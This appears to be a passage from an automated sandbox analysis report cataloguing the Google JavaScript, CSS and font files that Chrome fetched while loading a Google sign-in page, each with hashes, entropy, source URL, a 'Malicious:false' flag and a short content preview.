                                                                                                                                                                                                                                  SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                                  SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):178482
                                                                                                                                                                                                                                  Entropy (8bit):5.547385355215203
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4fxWlQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQP:t0PuJQ+ApsOOFZNnvOxWlqOQMmsWrBQa
                                                                                                                                                                                                                                  MD5:A93B4B4BB508ADCE7844C065F46F3923
                                                                                                                                                                                                                                  SHA1:ADA20C6D32F062612471F04A30EFBA5B2D0D2ECF
                                                                                                                                                                                                                                  SHA-256:B6DCDE100699EF70477BEB30B92DE7E70155285C740892678D7261622AC1130F
                                                                                                                                                                                                                                  SHA-512:386C0B752CB7D7D5D44CDD7DCFE89B113B899C8CF8C832B94EA8F83292ADC8615718DF421685BB7084E39FF4F721F7264BF8012CD84D4DF7502BE2795F94C9EF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,q_sf,q_pc,qmd,qcwid,qapid,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
                                                                                                                                                                                                                                  Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi||(_.Yi=new Zi)).set(a,b);(_.$i||(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a|1};_.hj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.ij=function(a,b,c){32&b&&c||(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (6046), with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):6046
                                                                                                                                                                                                                                  Entropy (8bit):5.35134104261919
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvUY6FrYpVv:lXT0TGKiqggdaAg8IF8uM8DMY6FrYpN
                                                                                                                                                                                                                                  MD5:D0311B6404553F93CB1DA65AF393EEAF
                                                                                                                                                                                                                                  SHA1:63968A253E55E6765E3FA1BF7A3A5D5BFD2FDCC4
                                                                                                                                                                                                                                  SHA-256:1068EA079C347EA7820A301FD89D91CA89B48BD2477D0461EB55C7733F390F65
                                                                                                                                                                                                                                  SHA-512:CBB17A823802CA1DDB06F5F91C4E34ECB71151837B496F323B5CCF5204502026DE1E490794D12A09577C2E6E0949795A4F8A22C15BD671F7E846841E3DCD3408
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=q_sf,qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                  Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (722)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3492
                                                                                                                                                                                                                                  Entropy (8bit):5.367947722774756
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:oi+XGTzRus0QeUQqkFRcA5c9byU6UBzUw:J+2Tn94qkFRcVbyU62h
                                                                                                                                                                                                                                  MD5:0C28D5034535BF7E084E8575421231AE
                                                                                                                                                                                                                                  SHA1:66C2551829EE54B78CD0A45CE42F65E6E8E18EFB
                                                                                                                                                                                                                                  SHA-256:090E2488919925028778D36D3E7141BED740F5721EAFCEBC8573CA7EE0699CC3
                                                                                                                                                                                                                                  SHA-512:CD640E2A13B0FF53E55EA43F019CDAD2837CD905C07C86BEFA72351BCD7B4460B35D031C745FD539F74C03D2599CABA5B7B426D005A6A3AA0D70511733DC3BCC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.Pg(_.Pqa);._.k("sOXFj");.var Wu=function(){_.Kt.call(this)};_.K(Wu,_.Ku);Wu.Ca=_.Ku.Ca;Wu.prototype.aa=function(a){return a()};_.Ou(_.Oqa,Wu);._.l();._.k("oGtAuc");._.Yya=new _.Df(_.Pqa);._.l();._.k("q0xTif");.var Tza=function(a){var b=function(d){_.To(d)&&(_.To(d).Mc=null,_.lv(d,null));d.XyHi9&&(d.XyHi9=null)};b(a);a=a.querySelectorAll("[c-wiz]");for(var c=0;c<a.length;c++)b(a[c])};_.wv=function(a,b){a&&_.Ff.hc().register(a,b)};_.xv=function(a){_.kv.call(this,a.La);var b=this,c=a.context.Zga;this.oa=c.Hr;this.kd=this.Pa=this.eb=this.Ba=null;this.Ma=a.Fa.Lc;this.Wa=a.Fa.lpa;a=this.oa.oa.then(function(d){b.Ba=d;d=b.oa.id.Z6(d,b.oa.getParams());b.eb=d.variant});c=c.a2.then(function(d){b.Pa=d});this.Ea=this.Ea.bind(this);this.hj(_.Ni([a,c]))};_.K(_.xv,_.kv);_.xv.Ca=function(){return{context:{Zga:"FVxLkf"},Fa:{Lc:_.Uu,component:_.qv,lpa:_.Yya}}};_.xv.prototype.aa=function(){ret
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15988, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):15988
                                                                                                                                                                                                                                  Entropy (8bit):7.985554788162145
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:JfFDqxG/bHq3qmBgWpwqOu9ulbiyuY+ifPqlBOpMEyNKF:1FuI/3mBgWpwLlmsaBOSuF
                                                                                                                                                                                                                                  MD5:CB4F5F85FAE1369135CB93997B0C7507
                                                                                                                                                                                                                                  SHA1:2FD7A68C2A0291BD74B6A6C6E229B60876B1C1F8
                                                                                                                                                                                                                                  SHA-256:06E60764F2F683EF1562780A928735CA90BD7FF7B7376D2818C8445BE9C29669
                                                                                                                                                                                                                                  SHA-512:9275475936E2840008A6D2FF86C1080D484178E964EB3C06D5A12D70F79F5E8E09C97126C139C86BE95EC15C9971142F2455E002C0B336344D3060C16D3B9B04
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/googlesanstext/v22/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTnmhjtg.woff2
                                                                                                                                                                                                                                  Preview:wOF2......>t..........>...........................<.....:.`..:.....(........6.$..(. ..&..N...X...!.q.........h.?=.H..q............uT7]/.....(K.ZRfl.d..=)....)..P..[...>J../.....z .tud;...w....Z8....k#.........uW.Y.8..C.d.N...\..-|.zy........`..j.a...QjF&....?.w.\B.H..B8.B.!...B..:5.T..bR1*P3j.X..i......(ox~.=c.7...1@".......A1Q,.\.N.yw.].....zW...}:.g$...MA..[{9S..|@... .?...?..Kh=.{.#..;.P.........8.}..[K%.x@#....7..PBv.(...p....C.....~.........Dp......k.6.8 ~...|..9FF..0.c.cG.qy... ...RK.R.....H.M6.*6)/. .EX...9fIr..V...........}....y.....X.h.....=r.L.5..../.1X#".X,.D&...,%H.?.......mjs..$RXA>...a.\.\S<.....5)..."..J!.:.uh.(..cVX.:D,......!(.....w.^...Xp..=..ze.S+...y$....`.y../...j#.g..5.#r$"V..k...j.....E$..O.L..!.F....7..7.X/U.e...v.16.......R....G.J...pP..;.........Q....=.i.?GG&....B......+....E.....c.W.[.X,H($.J./..........L..@..c....(:.:...K...?..B...# .... ...^...q._FA.O..P.|n-...XVT..}.8M...QD......#..s..b...@.L!..? -C..04 ..SK..O$...n.;.*....'
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):15552
                                                                                                                                                                                                                                  Entropy (8bit):7.983966851275127
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzi:jslQ+LhUoTB0Qr6Qjkg/DmcJufzi
                                                                                                                                                                                                                                  MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                                                                                                                                                                                                  SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                                                                                                                                                                                                  SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                                                                                                                                                                                                  SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                                                                                                  Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2768)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):21434
                                                                                                                                                                                                                                  Entropy (8bit):5.3955761453461815
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:E19QnqywT3PJSzjXEMuvCq+hIulfKcyNkCfUca8RQ0Gp5fYLDFgDOpjOq:E19QnXwTBiEMuvCq+GMypfU58RQ0Gp2T
                                                                                                                                                                                                                                  MD5:82C4A5602061F4DD9827DFB8D372F50D
                                                                                                                                                                                                                                  SHA1:3F43DCB1E2C76AF2DE5393B741B161C8551C7EA4
                                                                                                                                                                                                                                  SHA-256:1BFE79EDB9C5AB086CBBFE9BD3E57908E46BCEC22EFB981FF6929319BDAD30EF
                                                                                                                                                                                                                                  SHA-512:B171650A2BCFF3067465EAB5C50A62FD52C8D6AC64C89D73E03E19CB898D93DBCB7492E19DD08A1E3D3B3BAB8E19712C93F15FDEEC05F00D7A7605C9F5B1E8D9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.r1rg6QgmKXQ.es5.O/ck=boq-identity.AccountsSignInUi.LKDR6mlAzks.L.B1.O/am=iRnMZPgGABD_cBrQG1AkEDIAAAAAAAAAAGADAADIYQ/d=1/exm=AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,MpJwZc,NOeYWe,O6y8ed,PHUIyb,PrPYRd,Rkm0ef,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,eVCnO,f8Gu1e,hc6Ubd,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,niKKCd,njlZCf,oLggrd,oqkvIf,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xBaz7b,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlGArwG7Kxzg65_VsZCF0RXYsD32Uw/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=p3hmRc,LvGhrf,RqjULd"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{.var nIa;._.pIa=function(){var a=nIa(_.Le("xwAfE"),function(){return _.Le("UUFaWc")}),b=nIa(_.Le("xnI9P"),function(){return _.Le("u4g7r")}),c,d,e,f;return(f=oIa)!=null?f:oIa=Object.freeze({isEnabled:function(g){return g===-1||_.rf(_.Le("iCzhFc"),!1)?!1:a.enabled||b.enabled},environment:(c=_.il(_.Le("y2FhP")))!=null?c:void 0,TS:(d=_.il(_.Le("MUE6Ne")))!=null?d:void 0,At:(e=_.il(_.Le("cfb2h")))!=null?e:void 0,Yp:_.kl(_.Le("yFnxrf"),-1),n2:_.TFa(_.Le("fPDxwd")).map(function(g){return _.kl(g,0)}).filter(function(g){return g>0}),.c7:a,fya:b})};nIa=function(a,b){a=_.rf(a,!1);return{enabled:a,PX:a?_.Nd(_.ll(b(),_.Lz)):qIa()}};_.Lz=function(a){this.Ha=_.u(a)};_.K(_.Lz,_.v);var qIa=function(a){return function(){return _.sd(a)}}(_.Lz);var oIa;._.k("p3hmRc");.var ZIa=function(a){a.Ea=!0;return a},$Ia=function(a,b,c,d){this.transport=a;this.aa=b;this.da=c;this.environment=d;this.fa=Number
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):6015
                                                                                                                                                                                                                                  Entropy (8bit):5.417043325436399
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:GhOEazFZMOEaK3qOEanOEajJc+u+OEa7NMhOXa7FZMOXa93qOXagOXaEJc+u+OXM:GuPK3Ng3k+tA93OoALmLy13Eq4tK
                                                                                                                                                                                                                                  MD5:0B414B7DB9A539E8EE336BCDCA5F8FDD
                                                                                                                                                                                                                                  SHA1:CB596295697D8D7CBAB3FE7C9FEAC1AC35FF384B
                                                                                                                                                                                                                                  SHA-256:40760A00D5366341EFF02BFD114E8FB328DD3926295073397F0CAA00B7E3B070
                                                                                                                                                                                                                                  SHA-512:51D9A66BFFB08E76F8413FB4B173070F3499F38C0C2AFFAAF1217E904B1FE6FDD500E9242EF8278BD7D948014070B2A5AB421E982AF82DD0DE7B33D5506788BA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.googleapis.com/css2?family=Google+Sans+Text:wght@400;500;700&display=swap
                                                                                                                                                                                                                                  Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* cyrillic */.@font-face {. font-family: 'Google Sans Text';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qE52i1dC.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek */.@font-face {. font-family: 'Google Sans Text';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEl2i1dC.woff2) format('woff2');. unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF;.}./* vietnamese */.@font-face {. font-family: 'Google Sans Text';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEV2i1dC.woff2) format('woff2');. unicode-range: U+0102-0103, U+
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4245)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):121769
                                                                                                                                                                                                                                  Entropy (8bit):5.4739773711708555
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:OYIcfKtW4VB4DUhcC8vnhKtntTCnXAmhdozsCb0YJr35ecMNiycRAD/lsJTD5qzR:dIyKGRKR6Q2XXYJrJTD5qWT88I
                                                                                                                                                                                                                                  MD5:A30AD4B824EABD49827717DA4DD32163
                                                                                                                                                                                                                                  SHA1:BE003CDBFD22A27CF8C7B5CD12267E1DDAC23120
                                                                                                                                                                                                                                  SHA-256:4BB8D199FC83D95CF64D3ECE1F6A53F27535B0F335471ED675C03B729A7BBF86
                                                                                                                                                                                                                                  SHA-512:A9A4A1C8E94C875E2E7BA5A9BE929B59568127F21ABB921EF2721BD84E6329EE50D7B2B19AA7394F961926B64627A0B3ED4044EDDAA93E4A77F6E8A26A185E12
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js
                                                                                                                                                                                                                                  Preview:(function(){var m,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},t=ca(this),v=function(a,b){if(b)a:{var c=t;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.v("Symbol",function(a){if(a)return a;var b=function(g,f){this.$jscomp$symbol$id_=g;ba(this,"description",{configurable:!0,writable:!0,value:f})};b.prototype.toString=function(){return this.$jscomp$symbol$id_};var c="jscomp_symbol_"+(Math.random
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (522)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5046
                                                                                                                                                                                                                                  Entropy (8bit):5.312492340620023
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:oz+ZgPGU74TnqKgb8nx0HGJzLmMIjh1xXnau7OTXuDOc7JIB3KmmRue8w:jEGU7RD8nx08dknaKAXWOc76B3K7RHJ
                                                                                                                                                                                                                                  MD5:14CB3DBC7636F9382A486C95D964EDE5
                                                                                                                                                                                                                                  SHA1:DB7304683E15C83716704EBE4AA656E2167AFCF1
                                                                                                                                                                                                                                  SHA-256:3223C5790D6AB8A2D89E35777FD90C38FEC70F8083590C4E406354DF5279C8E6
                                                                                                                                                                                                                                  SHA-512:FD96A19F4519AB0F8F3900FB2DEB9F5BB3DAD9AA06EE19504EF4FEC5570D2249781C5382914B389D0A5BAFDC2F271460CF7381F5F3A92E5FF8241A4351AC35F6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.iOa=_.z("wg1P6b",[_.yB,_.Eo,_.Lo]);._.k("wg1P6b");.var Y9a;Y9a=_.Rh(["aria-"]);._.MI=function(a){_.W.call(this,a.La);this.Ma=this.Ba=this.aa=this.viewportElement=this.Pa=null;this.Yc=a.Fa.Hf;this.eb=a.Fa.focus;this.Lc=a.Fa.Lc;this.fa=this.Lj();a=-1*parseInt(_.xp(this.Lj().el(),"marginTop")||"0",10);var b=parseInt(_.xp(this.Lj().el(),"marginBottom")||"0",10);this.Wa={top:a,right:0,bottom:b,left:0};a=_.rf(this.getData("isMenuDynamic"),!1);b=_.rf(this.getData("isMenuHoisted"),!1);this.Ea=a?1:b?2:0;this.oa=!1;this.Da=1;this.Ea!==1&&(this.aa=this.Sa("U0exHf").children().Sc(0),this.hj(Z9a(this,.this.aa.el())));_.KF(this.Aa())&&(a=this.Aa().el(),b=this.Ne.bind(this),a.__soy_skip_handler=b)};_.K(_.MI,_.W);_.MI.Ca=function(){return{Fa:{Hf:_.zF,focus:_.oF,Lc:_.Uu}}};_.MI.prototype.iA=function(a){var b=a.source;this.Pa=b;var c;((c=a.data)==null?0:c.mB)?(a=a.data.mB,this.Da=a==="MOUSE"
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5693)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):717624
                                                                                                                                                                                                                                  Entropy (8bit):5.592889120362087
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:T7rqHwhFzVCqOV/f8JaoFU+4ynd1CfZ3zN:zqHiVCqK/f2U+4ydMz
                                                                                                                                                                                                                                  MD5:3E52122D2EFFFB725AE19137800AFE1E
                                                                                                                                                                                                                                  SHA1:9F8CA2F95E4FD3AD26BE9BE1EE8A8824A0FA93C4
                                                                                                                                                                                                                                  SHA-256:87A775E8B14F8BFBA085A3FC0621A34746973727A710387BADC922332C8572E7
                                                                                                                                                                                                                                  SHA-512:82B07793B78B1219FC1DF44EE792ECFC68D0CC49374892943633DEB8C0B32CCB5246D9CD6C66F90267AC64DF96A5F15E928E46DC0C14F65C3D8E1CAB18C11A3C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
